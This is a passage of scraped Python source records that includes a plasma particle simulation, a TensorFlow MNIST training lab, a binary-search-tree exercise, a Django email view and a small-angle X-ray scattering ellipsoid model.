self.docker_client.remove_network(network['Id'])\n","sub_path":"rally-jobs/plugins/scenarios/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"144143469","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 25 20:30:31 2019\r\n\r\n@author: tacon\r\n\"\"\"\r\n\r\nwidth = 1E-4\r\nheight = 1E-4\r\n\r\nne, ni = 400, 400\r\nTe = 1E4 #k\r\nTi = Te/1000 #k\r\nq = 1.602176634E-19\r\nme = 9.10938356E-31\r\nmi = 131.293 * 1.66054E-27\r\nkb = 1.38064852E-23\r\nep0 = 8.8541878128E-12\r\nke = 8.9875517873681764E9\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\n\r\ndef setup(ne, ni):\r\n PDB = np.zeros((ne+ni,8))\r\n vthe = np.sqrt((3*kb*Te)/me)\r\n vthi = np.sqrt((3*kb*Ti)/mi)\r\n alpha = np.random.uniform(0, 2*np.pi, (ne + ni))\r\n PDB[: ,0] = np.random.uniform(0, width ,((ne + ni)))\r\n PDB[: ,1] = np.random.uniform(0, height,((ne + ni)))\r\n PDB[:ne,2] = vthe * np.cos(alpha[:ne])\r\n PDB[:ne,3] = vthe * np.sin(alpha[:ne])\r\n PDB[ne:,2] = vthi * np.cos(alpha[:ne])\r\n PDB[ne:,3] = vthi * np.sin(alpha[:ne])\r\n PDB[:ne,6] = -q\r\n PDB[ne:,6] = q\r\n PDB[:ne,7] = me\r\n PDB[ne:,7] = mi\r\n return PDB\r\n\r\nPDB = setup(ne, ni)\r\n\r\ndef timeStep(stepSize):\r\n PDB[:,2:4] += PDB[:,4:6] * stepSize\r\n PDB[:,0:2] += PDB[:,2:4] * stepSize\r\n PDB[:,2] = np.where(PDB[:,0] > width, -1 * PDB[:,2], PDB[:,2])\r\n PDB[:,3] = np.where(PDB[:,1] > height, -1 * PDB[:,3], PDB[:,3])\r\n PDB[:,2] = np.where(PDB[:,0] < 0, -1 * PDB[:,2], PDB[:,2])\r\n PDB[:,3] = np.where(PDB[:,1] < 0, -1 * PDB[:,3], PDB[:,3])\r\n return PDB\r\n\r\ndef forceFinder():\r\n accels = np.zeros((ne+ni,2))\r\n for number, particle in enumerate(PDB):\r\n calculations = np.zeros((ne+ni,9))\r\n x0 = np.full((ne+ni, 1), particle[0])\r\n y0 = np.full((ne+ni, 1), particle[1])\r\n q0 = np.full((ne+ni, 1), particle[-2])\r\n calculations[:,0] = np.subtract(x0[:,0], 
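The PlasmaSim record starting above seeds every particle at its species' thermal speed with a random direction; that initialization in isolation, using the record's own constants:

import numpy as np

kb = 1.38064852e-23   # Boltzmann constant, J/K
me = 9.10938356e-31   # electron mass, kg
Te = 1e4              # electron temperature, K

n = 400
vth = np.sqrt(3 * kb * Te / me)            # from (3/2) kT = (1/2) m v^2
alpha = np.random.uniform(0, 2 * np.pi, n)
vx, vy = vth * np.cos(alpha), vth * np.sin(alpha)
# Speeds are uniform in magnitude and isotropic in direction.
assert np.allclose(np.hypot(vx, vy), vth)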
PDB[:,0])\r\n calculations[:,1] = np.subtract(y0[:,0], PDB[:,1])\r\n calculations[number,0:2] = np.array((1e5, 1e5))\r\n calculations[:,2] = np.add(np.power(calculations[:,0],2), np.power(calculations[:,1],2))\r\n calculations[:,3] = np.power(calculations[:,2],0.5)\r\n calculations[:,4] = np.divide(calculations[:,0], calculations[:,3])\r\n calculations[:,5] = np.divide(calculations[:,1], calculations[:,3])\r\n calculations[:,6] = ke * np.divide(np.multiply(q0[:,0],PDB[:,-2]), calculations[:,2])\r\n calculations[:,7] = np.divide(np.multiply(calculations[:,6],calculations[:,4]), PDB[:,-1])\r\n calculations[:,8] = np.divide(np.multiply(calculations[:,6],calculations[:,5]), PDB[:,-1])\r\n accels[number,:] = (np.sum(calculations[:,7]),np.sum(calculations[:,8]))\r\n return accels\r\n \r\ndef findEnergy():\r\n velMagEl = np.sqrt(np.power(PDB[:ne,2],2), np.power(PDB[:ne,3],2))\r\n velMagIo = np.sqrt(np.power(PDB[ne:,2],2), np.power(PDB[ne:,3],2))\r\n return np.sum(np.sum(velMagEl)), np.sum(np.sum(velMagIo))\r\n\r\nfig, (ax, deb) = plt.subplots(1, 2)\r\nfig.canvas.set_window_title('Plasma Simulation')\r\ntime.sleep(10)\r\n\r\nenergyE = []\r\nenergyI = []\r\nstepNum = 1\r\nstep = []\r\n\r\nwhile True:\r\n energies = findEnergy()\r\n energyE.append(np.log10(energies[0]))\r\n energyI.append(np.log10(energies[1]))\r\n step.append(stepNum)\r\n if stepNum == 0:\r\n time.sleep(10)\r\n stepNum += 1\r\n ax.plot(PDB[:ne,0], PDB[:ne,1], 'o', color = \"blue\", alpha = 0.7)\r\n ax.plot(PDB[ne:,0], PDB[ne:,1], 'o', color = \"red\", alpha = 0.7)\r\n ax.set_xlim([0,width])\r\n ax.set_ylim([0,height])\r\n deb.plot(step, energyE, color = \"blue\", alpha = 0.7)\r\n deb.plot(step, energyI, color = \"red\", alpha = 0.7)\r\n plt.pause(0.001)\r\n plt.draw()\r\n ax.cla()\r\n deb.cla()\r\n PDB[:,4:6] = forceFinder()\r\n PDB = timeStep(1E-12)\r\n if stepNum > 200:\r\n del energyE[0]\r\n del energyI[0]\r\n del step[0]","sub_path":"PlasmaSim.py","file_name":"PlasmaSim.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"387521958","text":"# Lab 7 Learning rate and Evaluation\nimport tensorflow as tf\nimport random\n# import matplotlib.pyplot as plt\ntf.set_random_seed(777) # for reproducibility\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n# Check out https://www.tensorflow.org/get_started/mnist/beginners for\n# more information about the mnist dataset\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\nnb_classes = 10\n\n# MNIST data image of shape 28 * 28 = 784\nX = tf.placeholder(tf.float32, [None, 784])\n# 0 - 9 digits recognition = 10 classes\nY = tf.placeholder(tf.float32, [None, nb_classes])\n\n\nwith tf.name_scope(\"layer1\") as scope:\n W1 = tf.get_variable(\"W1\", shape=[784, 256],\n initializer=tf.contrib.layers.xavier_initializer())\n b1 = tf.Variable(tf.random_normal([256]), name='bias1')\n layer1 = tf.nn.relu(tf.matmul(X, W1) + b1)\n\n w1_hist = tf.summary.histogram(\"weights1\", W1)\n b1_hist = tf.summary.histogram(\"biases1\", b1)\n layer1_hist = tf.summary.histogram(\"layer1\", layer1)\nwith tf.name_scope(\"layer2\") as scope:\n W2 = tf.get_variable(\"W2\", shape=[256, 256],\n initializer=tf.contrib.layers.xavier_initializer())\n b2 = tf.Variable(tf.random_normal([256]), name='bias2')\n layer2 = tf.nn.relu(tf.matmul(layer1, W2) + b2)\n\n w2_hist = tf.summary.histogram(\"weights2\", W2)\n b2_hist = tf.summary.histogram(\"biases2\", b2)\n layer2_hist = 
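timeStep above reflects particles off the box walls with np.where; the boundary handling alone, as a one-dimensional sketch:

import numpy as np

def reflect(pos, vel, lo, hi):
    # Flip velocity components for particles that have crossed either wall.
    return np.where((pos < lo) | (pos > hi), -vel, vel)

v = reflect(np.array([-0.1, 0.5, 1.2]), np.array([-1.0, 1.0, 1.0]), 0.0, 1.0)
assert (v == np.array([1.0, 1.0, -1.0])).all()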
tf.summary.histogram(\"layer2\", layer2)\n\nwith tf.name_scope(\"layer3\") as scope:\n W3 = tf.get_variable(\"W3\", shape=[256, 10],\n initializer=tf.contrib.layers.xavier_initializer())\n b3 = tf.Variable(tf.random_normal([nb_classes]), name='bias3')\n hypothesis = tf.matmul(layer2, W3) + b3\n w3_hist = tf.summary.histogram(\"weights3\", W3)\n b3_hist = tf.summary.histogram(\"biases3\", b3)\n layer3_hist = tf.summary.histogram(\"hypothesis\", hypothesis)\n\n\n# cost/loss function\n\nwith tf.name_scope(\"cost\") as scope:\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=logits, labels=Y))\n cost_summ = tf.summary.scalar(\"cost\", cost)\n\nwith tf.name_scope(\"train\") as scope:\n optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n\n# Test model\nis_correct = tf.equal(tf.arg_max(hypothesis, 1), tf.arg_max(Y, 1))\n# Calculate accuracy\naccuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\naccuracy_summ = tf.summary.scalar(\"accuracy\", accuracy)\n# parameters\ntraining_epochs = 15\nbatch_size = 100\n\nwith tf.Session() as sess:\n # Initialize TensorFlow variables\n sess.run(tf.global_variables_initializer())\n merged_summary = tf.summary.merge_all()\n writer = tf.summary.FileWriter(\"./logs/mnist_NN_r0_1\")\n writer.add_graph(sess.graph) # Show the graph\n # Training cycle\n for epoch in range(training_epochs):\n \n avg_cost = 0\n total_batch = int(mnist.train.num_examples / batch_size)\n\n\n for step in range(total_batch):\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n summary, c, _ = sess.run([merged_summary, cost, optimizer], feed_dict={\n X: batch_xs, Y: batch_ys})\n\n writer.add_summary(summary, global_step=step)\n avg_cost += c / total_batch\n\n print('Epoch:', '%04d' % (epoch + 1),\n 'cost =', '{:.9f}'.format(avg_cost))\n\n print(\"Learning finished\")\n\n # # Test the model using test sets\n print(\"Accuracy: \", accuracy.eval(session=sess, feed_dict={\n X: mnist.test.images, Y: mnist.test.labels}))\n\n # # Get one and predict\n # r = random.randint(0, mnist.test.num_examples - 1)\n # print(\"Label: \", sess.run(tf.argmax(mnist.test.labels[r:r + 1], 1)))\n # print(\"Prediction: \", sess.run(\n # tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r:r + 1]}))\n\n # don't know why this makes Travis Build error.\n # plt.imshow(\n # mnist.test.images[r:r + 1].reshape(28, 28),\n # cmap='Greys',\n # interpolation='nearest')\n # plt.show()\n\n\n'''\nEpoch: 0001 cost = 2.868104637\nEpoch: 0002 cost = 1.134684615\nEpoch: 0003 cost = 0.908220728\nEpoch: 0004 cost = 0.794199896\nEpoch: 0005 cost = 0.721815854\nEpoch: 0006 cost = 0.670184430\nEpoch: 0007 cost = 0.630576546\nEpoch: 0008 cost = 0.598888191\nEpoch: 0009 cost = 0.573027079\nEpoch: 0010 cost = 0.550497213\nEpoch: 0011 cost = 0.532001859\nEpoch: 0012 cost = 0.515517795\nEpoch: 0013 cost = 0.501175288\nEpoch: 0014 cost = 0.488425370\nEpoch: 0015 cost = 0.476968593\nLearning finished\nAccuracy: 0.888\n'''\n","sub_path":"lab-07-4-mnist_introduction.py","file_name":"lab-07-4-mnist_introduction.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"582316901","text":"import unittest\nfrom tree import TreeNode\n\n\ndef bst(nums, left, right):\n if left > right:\n return None\n\n index = int((left + right) / 2)\n node = TreeNode(nums[index])\n\n node.left = bst(nums, left, index - 1)\n node.right = bst(nums, index + 1, right)\n return node\n\n\nclass Solution(object):\n\n def 
sortedArrayToBST(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n \"\"\"\n return bst(nums, 0, len(nums) - 1)\n\n\nclass Test(unittest.TestCase):\n\n def test(self):\n self.assertEqual(\n Solution().sortedArrayToBST([1, 2, 3, 4, 5, 6]).to_array(),\n [3, 1, 5, None, 2, 4, 6])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"p108_recursion.py","file_name":"p108_recursion.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"542799693","text":"from django.shortcuts import render\r\nfrom django.core.mail import send_mail\r\nfrom .forms import SendMail\r\nfrom django.http import HttpResponse\r\n\r\ndef home_view(request):\r\n if request.method == 'POST':\r\n form=SendMail(request.POST)\r\n \r\n if form.is_valid():\r\n subject=form.cleaned_data[\"subject\"]\r\n email=form.cleaned_data[\"to\"]\r\n message=form.cleaned_data[\"message\"]\r\n url=request.build_absolute_uri()\r\n print(url)\r\n send_mail(subject,message+\"\\n\"+url,\"admin@gmail.com\",[email])\r\n return HttpResponse(\"successfully Send Email\")\r\n else:\r\n form=SendMail()\r\n context={\r\n 'form':form,\r\n }\r\n\r\n return render(request,\"core/home.html\",context)\r\n","sub_path":"day51/myproject/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"264210173","text":"####Please do not remove lines below####\nfrom lmfit import Parameters\nimport numpy as np\nimport sys\nimport os\nsys.path.append(os.path.abspath('.'))\nsys.path.append(os.path.abspath('./Functions'))\nsys.path.append(os.path.abspath('./Fortran_routines'))\nfrom functools import lru_cache\n####Please do not remove lines above####\n\n####Import your modules below if needed####\n#from ff_ellipsoid import ff_ellipsoid_ml_asaxs\nfrom Chemical_Formula import Chemical_Formula\nfrom PeakFunctions import LogNormal, Gaussian\nfrom Structure_Factors import hard_sphere_sf, sticky_sphere_sf\nfrom utils import find_minmax, calc_rho, create_steps\nfrom functools import lru_cache\nimport time\n\nfrom numba import njit, prange\n\n@njit(parallel=True,cache=True)\ndef ellipsoid_ml_asaxs(q,Rx,RzRatio,rho,eirho,adensity,Nalf):\n dalf = 3.14159 / Nalf\n NLayers=len(rho)\n fft = np.zeros_like(q)\n ffs = np.zeros_like(q)\n ffc = np.zeros_like(q)\n ffr = np.zeros_like(q)\n for i in prange(len(q)):\n tRx = 0.0\n tRz = 0.0\n for j in prange(Nalf):\n alf = j * dalf\n tRx = 0.0\n tRz = 0.0\n tft = 0.0\n tfs = 0.0\n tfr = 0.0\n for k in range(NLayers-1):\n tRx += Rx[k]\n tRz += Rx[k] * RzRatio[k]\n Rx2 = tRx * tRx\n Rz2 = tRz * tRz\n V = 4 * 3.14159 * tRz * tRx ** 2 / 3.0\n rt = np.sqrt(Rx2 * np.sin(alf) ** 2 + Rz2 * np.cos(alf) ** 2)\n fac = 3 * V * (np.sin(q[i] * rt) - q[i] * rt * np.cos(q[i] * rt)) / (q[i] * rt) ** 3\n ft = (rho[k] - rho[k + 1]) * fac\n fs = (eirho[k] - eirho[k + 1]) * fac\n fr = (adensity[k] - adensity[k + 1]) * fac\n fc = fs * fr\n tft += ft\n tfs += fs\n tfr += fr\n fft[i] += np.abs(tft) ** 2 * np.sin(alf)\n ffs[i] += tfs ** 2 * np.sin(alf)\n ffc[i] += tfs * tfr * np.sin(alf)\n ffr[i] += tfr ** 2 * np.sin(alf)\n fft[i] *= dalf\n ffs[i] *= dalf\n ffc[i] *= dalf\n ffr[i] *= dalf\n return fft, ffs, ffc, ffr\n\n\nclass Ellipsoid_Uniform: #Please put the class name same as the function name\n def __init__(self, x=0, Np=10, error_factor=1.0, term='Total', dist='Gaussian', Energy=None, relement='Au', Nalf=200,\n 
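The sortedArrayToBST record above recurses on the midpoint so the resulting tree stays height-balanced; a self-contained version with an in-order check (TreeNode here is a stand-in for the record's tree module):

class TreeNode:
    def __init__(self, val):
        self.val, self.left, self.right = val, None, None

def sorted_to_bst(nums, lo=0, hi=None):
    # The midpoint becomes the root and each half a subtree,
    # keeping the height at O(log n).
    if hi is None:
        hi = len(nums) - 1
    if lo > hi:
        return None
    mid = (lo + hi) // 2
    node = TreeNode(nums[mid])
    node.left = sorted_to_bst(nums, lo, mid - 1)
    node.right = sorted_to_bst(nums, mid + 1, hi)
    return node

def inorder(node):
    return inorder(node.left) + [node.val] + inorder(node.right) if node else []

assert inorder(sorted_to_bst([1, 2, 3, 4, 5, 6])) == [1, 2, 3, 4, 5, 6]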
NrDep='False', norm=1.0, norm_err=0.01, Rsig=0.0, sbkg=0.0, cbkg=0.0, abkg=0.0, D=1.0, phi=0.1, U=-1.0,\n SF='None', mpar={'Layers':{'Material': ['Au', 'H2O'], 'Density': [19.32, 1.0], 'SolDensity': [1.0, 1.0],\n 'Rmoles': [1.0, 1.0], 'R': [1.0, 0.0],'RzRatio':[1.0,1.0]}}):\n \"\"\"\n Documentation\n Calculates the Energy dependent form factor of multilayered oblate nanoparticles with different materials\n\n x : Reciprocal wave-vector 'Q' inv-Angs in the form of a scalar or an array\n relement : Resonant element of the nanoparticle. Default: 'Au'\n Energy : Energy of X-rays in keV at which the form-factor is calculated. Default: None\n Np : No. of points with which the size distribution will be computed. Default: 10\n NrDep : Energy dependence of the non-resonant element. Default= 'False' (Energy independent), 'True' (Energy dependent)\n dist : The probability distribution fucntion for the radii of different interfaces in the nanoparticles. Default: Gaussian\n Nalf : Number of azimuthal angle points for angular averaging\n norm : The density of the nanoparticles in nanoMolar (nanoMoles/Liter)\n norm_err :\n sbkg : Constant incoherent background for SAXS-term\n cbkg : Constant incoherent background for cross-term\n abkg : Constant incoherent background for Resonant-term\n error_factor: Error-factor to simulate the error-bars\n term : 'SAXS-term' or 'Cross-term' or 'Resonant-term' or 'Total'\n D : Hard Sphere Diameter\n phi : Volume fraction of particles\n U : The sticky-sphere interaction energy\n SF : Type of structure factor. Default: 'None'\n Rsig : Width of distribution of radii\n mpar : Multi-parameter which defines the following including the solvent/bulk medium which is the last one. Default: 'H2O'\n Material ('Materials' using chemical formula),\n Density ('Density' in gm/cubic-cms),\n Density of solvent ('SolDensity' in gm/cubic-cms) of the particular layer\n Mole-fraction ('Rmoles') of resonant element in the material)\n Radii ('R' in Angs), and\n Height to Radii ratio ('RzRatio' ratio)\n \"\"\"\n if type(x) == list:\n self.x = np.array(x)\n else:\n self.x = x\n self.Nalf = Nalf\n self.norm = norm\n self.norm_err = norm_err\n self.sbkg = sbkg\n self.cbkg = cbkg\n self.abkg = abkg\n self.dist = dist\n self.Np = Np\n self.Energy = Energy\n self.relement = relement\n self.NrDep = NrDep\n # self.rhosol=rhosol\n self.error_factor = error_factor\n self.D = D\n self.phi = phi\n self.U = U\n self.Rsig = Rsig\n self.__mpar__ = mpar # If there is any multivalued parameter\n self.SF = SF\n self.term = term\n self.choices = {'dist': ['Gaussian', 'LogNormal'], 'NrDep': ['True', 'False'],\n 'SF': ['None', 'Hard-Sphere', 'Sticky-Sphere'],\n 'term': ['SAXS-term', 'Cross-term', 'Resonant-term',\n 'Total']} # If there are choices available for any fixed parameters\n self.__cf__ = Chemical_Formula()\n self.__fit__ = False\n self.output_params = {}\n self.output_params = {'scaler_parameters': {}}\n self.__mkeys__=list(self.__mpar__.keys())\n self.init_params()\n\n def init_params(self):\n \"\"\"\n Define all the fitting parameters like\n self.params.add('sig',value = 0, vary = 0, min = -np.inf, max = np.inf, expr = None, brute_step = None)\n \"\"\"\n self.params = Parameters()\n self.params.add('norm', value=self.norm, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('D', value=self.D, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('phi', value=self.phi, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('sbkg', 
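The ellipsoid_ml_asaxs kernel above averages the classic hard-particle amplitude 3V[sin(qr) - qr cos(qr)]/(qr)^3 over orientation; for a sphere (Rx = Rz) the orientation average is trivial and the amplitude reduces to the following sketch (unit contrast assumed):

import numpy as np

def sphere_form_factor(q, R):
    # Scattering amplitude of a homogeneous sphere of radius R.
    V = 4 * np.pi * R**3 / 3
    qr = q * R
    return 3 * V * (np.sin(qr) - qr * np.cos(qr)) / qr**3

q = np.logspace(-3, 0, 5)
amp = sphere_form_factor(q, 10.0)
# As q -> 0 the amplitude tends to the particle volume V.
assert np.isclose(sphere_form_factor(1e-6, 10.0), 4 * np.pi * 10.0**3 / 3)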
value=self.sbkg, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('cbkg', value=self.cbkg, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('abkg', value=self.abkg, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('U', value=self.U, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('Rsig', value=self.Rsig, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n for mkey in self.__mpar__.keys():\n for key in self.__mpar__[mkey].keys():\n if key != 'Material':\n for i in range(len(self.__mpar__[mkey][key])):\n self.params.add('__%s_%s_%03d' % (mkey, key, i), value=self.__mpar__[mkey][key][i], vary=0, min=-np.inf,\n max=np.inf, expr=None, brute_step=0.1)\n\n\n @lru_cache(maxsize=10)\n def calc_Rdist(self, R, Rsig, dist, N):\n R = np.array(R)\n totalR = np.sum(R[:-1])\n if Rsig > 0.001:\n fdist = eval(dist + '.' + dist + '(x=0.001, pos=totalR, wid=Rsig)')\n if dist == 'Gaussian':\n rmin, rmax = max(0.001, totalR - 5 * Rsig), totalR + 5 * Rsig\n dr = np.linspace(rmin, rmax, N)\n else:\n rmin, rmax = max(0.001, np.exp(np.log(totalR) - 5 * Rsig)), np.exp(np.log(totalR) + 5 * Rsig)\n dr = np.logspace(rmin, rmax, N, base=np.exp(1.0))\n fdist.x = dr\n rdist = fdist.y()\n sumdist = np.sum(rdist)\n rdist = rdist / sumdist\n return dr, rdist, totalR\n else:\n return [totalR], [1.0], totalR\n\n @lru_cache(maxsize=10)\n def ellipsoid(self, q, R, RzRatio, Rsig, rho, eirho, adensity, dist='Gaussian', Np=10, Nalf=1000):\n q = np.array(q)\n dr, rdist, totalR = self.calc_Rdist(R, Rsig, dist, Np)\n form = np.zeros_like(q)\n eiform = np.zeros_like(q)\n aform = np.zeros_like(q)\n cform = np.zeros_like(q)\n pfac = (2.818e-5 * 1.0e-8) ** 2\n for i in range(len(dr)):\n r = np.array(R) * (1 + (dr[i] - totalR) / totalR)\n fft,ffs,ffc,ffr = ellipsoid_ml_asaxs(q, r, RzRatio, rho, eirho, adensity, Nalf)\n form = form + rdist[i] * fft\n eiform = eiform + rdist[i] * ffs\n aform = aform + rdist[i] * ffr\n cform = cform + rdist[i] * ffc\n return pfac * form, pfac * eiform, pfac * aform, np.abs(pfac * cform) # in cm^2\n\n @lru_cache(maxsize=10)\n def ellipsoid_dict(self, q, R, RzRatio, Rsig, rho, eirho, adensity, dist='Gaussian', Np=10, Nalf=1000):\n form, eiform, aform, cform = self.ellipsoid(q, R, RzRatio, Rsig, rho, eirho, adensity, dist=dist, Np=Np, Nalf=Nalf)\n sqf={'Total':form,'SAXS-term':eiform,'Resonant-term':aform,'Cross-term':cform}\n return sqf\n\n def update_params(self):\n mkey=self.__mkeys__[0]\n key = 'Density'\n Nmpar = len(self.__mpar__[mkey][key])\n self.__density__ = [self.params['__%s_%s_%03d' % (mkey, key, i)].value for i in range(Nmpar)]\n key = 'SolDensity'\n self.__solDensity__ = [self.params['__%s_%s_%03d' % (mkey, key, i)].value for i in range(Nmpar)]\n key = 'Rmoles'\n self.__Rmoles__ = [self.params['__%s_%s_%03d' % (mkey, key, i)].value for i in range(Nmpar)]\n key = 'R'\n self.__R__ = [self.params['__%s_%s_%03d' % (mkey, key, i)].value for i in range(Nmpar)]\n key = 'RzRatio'\n self.__RzRatio__ = [self.params['__%s_%s_%03d' % (mkey, key, i)].value for i in range(Nmpar)]\n key = 'Material'\n self.__material__ = [self.__mpar__[mkey][key][i] for i in range(Nmpar)]\n\n def y(self):\n \"\"\"\n Define the function in terms of x to return some value\n \"\"\"\n svol = 1.5 * 0.0172 ** 2 / 370 ** 2 # scattering volume in cm^3\n self.update_params()\n rho, eirho, adensity, rhor, eirhor, adensityr = calc_rho(R=tuple(self.__R__), material=tuple(self.__material__),\n 
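calc_Rdist above discretizes a Gaussian size distribution over radii and renormalizes the weights before averaging; the same weighting in plain NumPy, with the PeakFunctions Gaussian replaced by the explicit formula:

import numpy as np

def gaussian_weights(R0, Rsig, N=10):
    # Sample radii within +/- 5 sigma and renormalize so weights sum to 1.
    r = np.linspace(max(1e-3, R0 - 5 * Rsig), R0 + 5 * Rsig, N)
    w = np.exp(-0.5 * ((r - R0) / Rsig) ** 2)
    return r, w / w.sum()

r, w = gaussian_weights(50.0, 2.0)
assert np.isclose(w.sum(), 1.0)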
relement=self.relement,\n density=tuple(self.__density__),\n sol_density=tuple(self.__solDensity__),\n Energy=self.Energy, Rmoles=tuple(self.__Rmoles__),\n NrDep=self.NrDep)\n major=np.sum(self.__R__)\n minor=np.sum(np.array(self.__R__)*np.array(self.__RzRatio__))\n self.output_params['scaler_parameters']['Diameter (Angstroms)']=2*major\n self.output_params['scaler_parameters']['Height (Angstroms)']=2*minor\n if self.dist=='LogNormal':\n dstd=2 * np.sqrt((np.exp(self.Rsig**2) - 1) * np.exp(2 * np.log(major) + self.Rsig**2))\n hstd=2 * np.sqrt((np.exp(self.Rsig**2) - 1) * np.exp(2 * np.log(minor) + self.Rsig**2))\n self.output_params['scaler_parameters']['Diameter_Std (Angstroms)'] = dstd\n self.output_params['scaler_parameters']['Height_Std (Angstroms)'] = hstd\n else:\n self.output_params['scaler_parameters']['Diameter_Std (Angstroms)'] =2*self.Rsig\n self.output_params['scaler_parameters']['Height_Std (Angstroms)'] = 2 * self.Rsig*minor/major\n if type(self.x) == dict:\n sqf = {}\n key='SAXS-term'\n sqft=self.ellipsoid_dict(tuple(self.x[key]), tuple(self.__R__),\n tuple(self.__RzRatio__), self.Rsig,\n tuple(rho), tuple(eirho), tuple(adensity),\n dist=self.dist, Np=self.Np, Nalf=self.Nalf)\n if self.SF is None:\n struct = np.ones_like(self.x[key]) # hard_sphere_sf(self.x[key], D = self.D, phi = 0.0)\n elif self.SF == 'Hard-Sphere':\n struct = hard_sphere_sf(self.x[key], D=self.D, phi=self.phi)\n else:\n struct = sticky_sphere_sf(self.x[key], D=self.D, phi=self.phi, U=self.U, delta=0.01)\n for key in self.x.keys():\n if key == 'SAXS-term':\n sqf[key] = self.norm * 6.022e20 *sqft[key] * struct + self.sbkg # in cm^-1\n if key == 'Cross-term':\n sqf[key] = self.norm * 6.022e20 *sqft[key] * struct + self.cbkg # in cm^-1\n if key == 'Resonant-term':\n sqf[key] = self.norm * 6.022e20 *sqft[key] * struct + self.abkg # in cm^-1\n key1='Total'\n total= self.norm * 6.022e20 *sqft[key1] * struct + self.sbkg\n if not self.__fit__:\n dr, rdist, totalR = self.calc_Rdist(tuple(self.__R__), self.Rsig, self.dist, self.Np)\n self.output_params['Distribution'] = {'x': dr, 'y': rdist}\n signal = total\n minsignal = np.min(signal)\n normsignal = signal / minsignal\n norm = np.random.normal(self.norm, scale=self.norm_err / 100.0)\n sqerr = np.random.normal(normsignal * norm, scale=self.error_factor)\n meta = {'Energy': self.Energy}\n if self.Energy is not None:\n self.output_params['simulated_w_err_%.4fkeV' % self.Energy] = {'x': self.x[key],\n 'y': sqerr * minsignal,\n 'yerr': np.sqrt(\n normsignal) * minsignal * self.error_factor,\n 'meta': meta}\n else:\n self.output_params['simulated_w_err'] = {'x': self.x[key], 'y': sqerr * minsignal,\n 'yerr': np.sqrt(normsignal) * minsignal}\n self.output_params['Total'] = {'x': self.x[key], 'y': total}\n for key in self.x.keys():\n self.output_params[key] = {'x': self.x[key], 'y': sqf[key]}\n self.output_params['rho_r'] = {'x': rhor[:, 0], 'y': rhor[:, 1]}\n self.output_params['eirho_r'] = {'x': eirhor[:, 0], 'y': eirhor[:, 1]}\n self.output_params['adensity_r'] = {'x': adensityr[:, 0], 'y': adensityr[:, 1]}\n self.output_params['Structure_Factor'] = {'x': self.x[key], 'y': struct}\n xtmp,ytmp=create_steps(x=self.__R__[:-1],y=self.__Rmoles__[:-1])\n self.output_params['Rmoles_radial']={'x':xtmp,'y':ytmp}\n xtmp, ytmp = create_steps(x=self.__R__[:-1], y=self.__RzRatio__[:-1])\n self.output_params['RzRatio_radial'] = {'x': xtmp, 'y': ytmp}\n xtmp, ytmp = create_steps(x=self.__R__[:-1], y=self.__density__[:-1])\n self.output_params['Density_radial'] = {'x': xtmp, 'y': 
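Note the tuple(...) conversions in the calls above: functools.lru_cache hashes its arguments, so list-valued parameters must be passed as tuples. A minimal illustration:

from functools import lru_cache

@lru_cache(maxsize=10)
def total(radii):   # radii must be hashable, hence a tuple
    return sum(radii)

assert total((1.0, 2.0)) == 3.0
# total([1.0, 2.0]) would raise TypeError: unhashable type: 'list'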
ytmp}\n else:\n if self.SF is None:\n struct = np.ones_like(self.x)\n elif self.SF == 'Hard-Sphere':\n struct = hard_sphere_sf(self.x, D=self.D, phi=self.phi)\n else:\n struct = sticky_sphere_sf(self.x, D=self.D, phi=self.phi, U=self.U, delta=0.01)\n\n tsqf, eisqf, asqf, csqf = self.ellipsoid(tuple(self.x), tuple(self.__R__), tuple(self.__RzRatio__), self.Rsig,\n tuple(rho), tuple(eirho),\n tuple(adensity), dist=self.dist, Np=self.Np, Nalf=self.Nalf)\n sqf = self.norm * np.array(tsqf) * 6.022e20 * struct + self.sbkg # in cm^-1\n if not self.__fit__: #Generate all the quantities below while not fitting\n asqf = self.norm * np.array(asqf) * 6.022e20 * struct + self.abkg # in cm^-1\n eisqf = self.norm * np.array(eisqf) * 6.022e20 * struct + self.sbkg # in cm^-1\n csqf = self.norm * np.array(csqf) * 6.022e20 * struct + self.cbkg # in cm^-1\n # sqerr = np.sqrt(6.022e20*self.norm*self.flux * tsqf * svol+self.sbkg)\n # sqwerr = (6.022e20*self.norm*tsqf * svol * self.flux+self.sbkg + 2 * (0.5 - np.random.rand(len(tsqf))) * sqerr)\n signal = 6.022e20 * self.norm * np.array(tsqf) * struct + self.sbkg\n minsignal = np.min(signal)\n normsignal = signal / minsignal\n norm = np.random.normal(self.norm, scale=self.norm_err / 100.0)\n sqerr = 